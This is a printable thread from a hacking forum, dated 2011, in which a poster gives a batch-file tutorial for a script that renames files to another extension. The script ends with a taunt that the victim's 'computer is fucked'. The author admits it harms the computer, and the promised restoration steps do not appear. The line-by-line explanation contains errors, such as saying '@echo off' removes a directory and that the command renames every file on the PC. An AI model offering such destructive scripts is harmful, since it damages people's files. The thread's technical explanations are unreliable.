![]() |
|
[Batch]Tutorial on changing all file types to another - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: [Batch]Tutorial on changing all file types to another (/Thread-Batch-Tutorial-on-changing-all-file-types-to-another) |
[Batch]Tutorial on changing all file types to another - Jacob - 07-31-2011 Requested by Black Sunlight (Nathan)
Remember to +rep and thank me for writing this guide, it'll be much appreciated and urge me to write more and more. Thank you! ~Jacob You have my permission to copy and paste this thread into other forums. Just give credits due to where they belong. --------------------------------------------------------------------- In this quick little tutorial I will be showing you how to change all of the files one your computer, to a single file type. For example: all .txt,.dll,.jpg,.mp3, etcetera; all changed to .exe extensions. Although this will do harm to your computer, its reversible. I will teach you how to first.
Another method of restoration if this batch is used on you
Note: The above procedure will work only if you've made no significant hardware changes. Alright, hopefully that you've read the restoration portion of this tutorial, i will now continue to the batch itself. Open notepad. Start>All Programs>Accessories>notepad or +R and type "notepad.exe" (no quotes)Copy paste this code into notepad Spoiler:Code: @echo off
ren *.* *.txt
echo.
echo.
echo. Well, now that you computer is fucked. Go ahead and press space/enter =)
pause >nulGo to File>Save as MUST change file type to "ALL FILE TYPES" Save as "anything".BAT Spoiler:Code meaning: Code: @echo off -- removes directory
ren *.* *.txt -- renames ALL files on pc, to "the name".txt
echo(*) -- New lines/text
pause -- Keeps cmd open, until you press any button
>nul -- Hides the command it is after, from sight (background running)
pause >nul -- Hides the "pause" and shows only the text on the screen not "press any key to continue..."RE: [Batch]Tutorial on changing all file types to another - White Charisma - 08-01-2011 Thanks dude ![]() appreciated
RE: [Batch]Tutorial on changing all file types to another - Jacob - 08-01-2011 (08-01-2011, 11:55 AM)Black Sunlight Wrote: Thanks dude you're very welcome! +rep if you likey(: Keep the requests coming! <33 |